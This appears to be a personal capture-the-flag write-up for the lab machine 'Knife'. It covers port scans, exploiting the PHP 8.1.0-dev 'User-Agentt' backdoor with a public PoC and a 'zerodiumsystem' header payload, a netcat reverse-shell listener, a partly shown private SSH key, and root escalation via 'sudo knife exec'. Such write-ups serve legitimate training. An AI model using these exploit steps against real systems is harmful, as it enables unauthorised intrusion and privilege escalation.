Knife - wook413

![[Pasted image 20250622212133.png]] --- # Port Scanning - Nmap Started off with Nmap TCP scanning against all 65,535 ports and found 2 open ports: 22 and 80 ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-22 19:57 CDT Nmap scan report for 10.10.10.242 Host is up (0.050s latency). Not shown: 63305 closed tcp ports (reset), 2228 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 15.61 seconds ``` A more detailed port scanning with `-sC` and `-sV` options against 2 ports found. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sC -sV $IP -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-22 19:59 CDT Nmap scan report for 10.10.10.242 Host is up (0.058s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA) | 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA) |_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Emergent Medical Idea |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.48 seconds ``` Lastly, port scanning against UDP ports but no open ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-22 20:00 CDT Nmap scan report for 10.10.10.242 Host is up (0.051s latency). Not shown: 994 open|filtered udp ports (no-response) PORT STATE SERVICE 9370/udp closed unknown 11487/udp closed unknown 18134/udp closed unknown 19663/udp closed unknown 19718/udp closed unknown 51586/udp closed unknown ``` # Footprinting ##### Port 80 This is the landing page hosted on port 80. It was interesting because I couldn't find any hints that would lead me to the next step. `Gobuster` didn't reveal any directories, and there was nothing in `/robots.txt` or `sitemap.xml`. I also didn't find anything useful in the page source. ![[Pasted image 20250622201347.png]] Then I performed a banner grabbing using `netcat`. What caught my eye was the value of `X-Powered-By` header. It just seemed very unfamiliar to me so I looked it up using `searchsploit`. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ curl -I $IP HTTP/1.1 200 OK Date: Mon, 23 Jun 2025 01:17:19 GMT Server: Apache/2.4.41 (Ubuntu) X-Powered-By: PHP/8.1.0-dev Content-Type: text/html; charset=UTF-8 ``` ![[Pasted image 20250622201812.png]] The PoC explains that "if this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header". Alright. Let's give this a go then :) ```bash Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/ Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py Contact: [email protected] An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell ont the host. ``` I downloaded the PoC through `searchsploit`, ran it, and I got the shell as user `james`. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ python3 49933.py Enter the full host url: http://10.10.10.242 Interactive shell is opened on http://10.10.10.242 Can't acces tty; job crontol turned off. $ whoami james ``` For some reason, I was not able to `cd` into any directories. Probably I am in some sort of a restricted shell or they blocked `cd` command. However, I was still able to grab the `user.txt` flag. ```bash $ ls /home/james user.txt $ cat /home/james/user.txt 19a8... ``` --- # Privilege Escalation `sudo -l` command revealed that I could run `/usr/bin/knife` as sudo without password. ```bash $ sudo -l Matching Defaults entries for james on knife: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User james may run the following commands on knife: (root) NOPASSWD: /usr/bin/knife ``` Looks like it has permission 777 set to the file, meaning any user can perform `READ`, `WRITE`, and `EXECUTE` operations on the file. ```bash $ ls -l /usr/bin/knife lrwxrwxrwx 1 root root 31 May 7 2021 /usr/bin/knife -> /opt/chef-workstation/bin/knife ``` I don't know why it keeps telling me "No input file specified". ```bash $ sudo /usr/bin/knife exec -E 'exec "/bin/sh"' No input file specified. ``` I've tried logging into SSH server with the SSH private key I got but it still prompted me to enter James' password. ```bash $ cat /home/james/.ssh/id_rsa -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn NhAAAAAwEAAQAAAgEAu7RPlIkBcbCjzL3GKxJpJyiUuVrxLm3rejPGlaKdnIYqrrwYDHNN <SNIP> -----END OPENSSH PRIVATE KEY----- ``` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ chmod 600 id_rsa ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ ls -l id_rsa -rw------- 1 parallels parallels 3381 Jun 22 20:53 id_rsa ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ ssh -i id_rsa james@$IP ssh: Could not resolve hostname : Name or service not known ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ ssh -i id_rsa [email protected] The authenticity of host '10.10.10.242 (10.10.10.242)' can't be established. ED25519 key fingerprint is SHA256:U3tuGrGxSv//jAzSQDRiUNlQnE6LWwounrcc2Bd0qC4. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes ``` Therefore, I decided to get the shell again but this time through `Burp Suite`. Using Burp Suite, we can add a new header `User-Agentt` and the value as `zerodiumsystem("cmd")` and notice I got the `id` value on the Response. ![[Pasted image 20250622211231.png]] Let's set up a listener before we sending off the reverse shell payload ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... ``` ![[Pasted image 20250622211809.png]] ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.6] from (UNKNOWN) [10.10.10.242] 53146 /bin/sh: 0: can't access tty; job control turned off $ whoami james ``` Got the `root.txt` flag! ```bash $ sudo knife exec -E 'exec "/bin/sh"' whoami root cat /root/root.txt e3df... ```